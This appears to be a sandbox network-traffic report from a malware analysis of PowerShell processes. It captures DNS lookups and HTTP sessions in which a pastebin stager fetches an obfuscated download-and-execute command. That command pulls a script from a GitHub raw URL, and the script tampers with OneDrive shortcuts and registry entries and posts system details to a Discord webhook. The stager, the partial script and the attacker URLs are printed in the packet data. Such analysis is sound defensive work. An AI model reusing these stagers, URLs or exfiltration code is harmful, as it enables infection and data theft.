                                                                Oct 15, 2024 18:06:45.317477942 CEST192.168.2.101.1.1.10xb6a7Standard query (0)pastebin.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 15, 2024 18:06:37.282885075 CEST1.1.1.1192.168.2.100x9f87No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:37.282885075 CEST1.1.1.1192.168.2.100x9f87No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:37.282885075 CEST1.1.1.1192.168.2.100x9f87No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:38.930844069 CEST1.1.1.1192.168.2.100x350eNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:38.930844069 CEST1.1.1.1192.168.2.100x350eNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:38.930844069 CEST1.1.1.1192.168.2.100x350eNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:38.930844069 CEST1.1.1.1192.168.2.100x350eNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:39.484944105 CEST1.1.1.1192.168.2.100x3895No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:39.484944105 CEST1.1.1.1192.168.2.100x3895No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:39.484944105 CEST1.1.1.1192.168.2.100x3895No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:39.484944105 CEST1.1.1.1192.168.2.100x3895No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:39.484944105 CEST1.1.1.1192.168.2.100x3895No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:45.326015949 CEST1.1.1.1192.168.2.100xb6a7No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:45.326015949 CEST1.1.1.1192.168.2.100xb6a7No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                Oct 15, 2024 18:06:45.326015949 CEST1.1.1.1192.168.2.100xb6a7No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • pastebin.com
                                                                • discord.com
                                                                • raw.githubusercontent.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1049707104.20.3.235801076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 18:06:37.314179897 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 18:06:37.955702066 CEST472INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 16:06:37 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=3600
                                                                Expires: Tue, 15 Oct 2024 17:06:37 GMT
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Server: cloudflare
                                                                CF-RAY: 8d310eb6ca212cdc-DFW
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.1049709185.199.109.133801076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 18:06:38.936966896 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 18:06:39.548886061 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 16:06:39 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210110-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729008399.489504,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 16:11:39 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.1049712104.20.4.235804084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 18:06:45.339966059 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 18:06:45.964656115 CEST472INHTTP/1.1 301 Moved Permanently
                                                                Date: Tue, 15 Oct 2024 16:06:45 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: keep-alive
                                                                Cache-Control: max-age=3600
                                                                Expires: Tue, 15 Oct 2024 17:06:45 GMT
                                                                Location: https://pastebin.com/raw/sA04Mwk2
                                                                Server: cloudflare
                                                                CF-RAY: 8d310ee8dfd46c43-DFW
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.1049714185.199.109.133804084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 15, 2024 18:06:47.442719936 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                Oct 15, 2024 18:06:48.057717085 CEST541INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                Content-Length: 0
                                                                Server: Varnish
                                                                Retry-After: 0
                                                                Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 16:06:47 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdal2120118-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729008408.985675,VS0,VE0
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Expires: Tue, 15 Oct 2024 16:11:47 GMT
                                                                Vary: Authorization,Accept-Encoding


                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1049708104.20.3.2354431076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 16:06:38 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 16:06:38 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 16:06:38 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 517
                                                                Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d310ebc4b98e96a-DFW
                                                                2024-10-15 16:06:38 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 16:06:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.1049710162.159.137.2324437752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 16:06:40 UTC333OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Content-Type: application/json
                                                                Host: discord.com
                                                                Content-Length: 298
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                2024-10-15 16:06:40 UTC25INHTTP/1.1 100 Continue
                                                                2024-10-15 16:06:40 UTC298OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4c 59 55 4b 56 59 39 5f 4f 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20
                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** LYUKVY9_O\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                2024-10-15 16:06:40 UTC1302INHTTP/1.1 404 Not Found
                                                                Date: Tue, 15 Oct 2024 16:06:40 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 45
                                                                Connection: close
                                                                Cache-Control: public, max-age=3600, s-maxage=3600
                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                x-ratelimit-limit: 5
                                                                x-ratelimit-remaining: 4
                                                                x-ratelimit-reset: 1729008401
                                                                x-ratelimit-reset-after: 1
                                                                via: 1.1 google
                                                                alt-svc: h3=":443"; ma=86400
                                                                CF-Cache-Status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0PunADJfgpv3LQ%2BXiq5HP1SYW8L1g2zQi0QLG%2FSZ0%2Fphizn9ucZJdw6EEIT4uI3F57IjW3ofrgKC869pFydhBUF2SrELMgzPqQbuSLeb%2F3qPcWsb2qe8bOQgZGMR"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Content-Type-Options: nosniff
                                                                Set-Cookie: __cfruid=d40ef3348837f805097580af303a248368f0e26d-1729008400; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                Set-Cookie: _cfuvid=qQi7Wn6Ttgz25nBlGDVFCEQV8zUZbgG72XzpHyUegoY-1729008400416-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                Server: cloudflare
                                                                CF-RAY: 8d310ec54bcb6bd1-DFW
                                                                {"message": "Unknown Webhook", "code": 10015}


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.1049711185.199.109.1334431076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 16:06:40 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 16:06:40 UTC900INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
                                                                Cache-Control: max-age=300
                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                Content-Type: text/plain; charset=utf-8
                                                                ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                Strict-Transport-Security: max-age=31536000
                                                                X-Content-Type-Options: nosniff
                                                                X-Frame-Options: deny
                                                                X-XSS-Protection: 1; mode=block
                                                                X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 15 Oct 2024 16:06:40 GMT
                                                                Via: 1.1 varnish
                                                                X-Served-By: cache-dfw-kdfw8210121-DFW
                                                                X-Cache: HIT
                                                                X-Cache-Hits: 0
                                                                X-Timer: S1729008400.263194,VS0,VE1
                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                X-Fastly-Request-ID: 4328baf95a900b2c25ca62dd77a378b95c50df64
                                                                Expires: Tue, 15 Oct 2024 16:11:40 GMT
                                                                Source-Age: 100
                                                                2024-10-15 16:06:40 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                2024-10-15 16:06:40 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                2024-10-15 16:06:40 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                2024-10-15 16:06:40 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                2024-10-15 16:06:40 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                2024-10-15 16:06:40 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.1049713104.20.4.2354434084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 16:06:46 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: pastebin.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 16:06:46 UTC397INHTTP/1.1 200 OK
                                                                Date: Tue, 15 Oct 2024 16:06:46 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                x-frame-options: DENY
                                                                x-content-type-options: nosniff
                                                                x-xss-protection: 1;mode=block
                                                                cache-control: public, max-age=1801
                                                                CF-Cache-Status: HIT
                                                                Age: 525
                                                                Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8d310eedc8dfeaac-DFW
                                                                2024-10-15 16:06:46 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                2024-10-15 16:06:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.1049715185.199.109.1334434084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-15 16:06:48 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                Host: raw.githubusercontent.com
                                                                Connection: Keep-Alive
                                                                2024-10-15 16:06:48 UTC900INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 7508
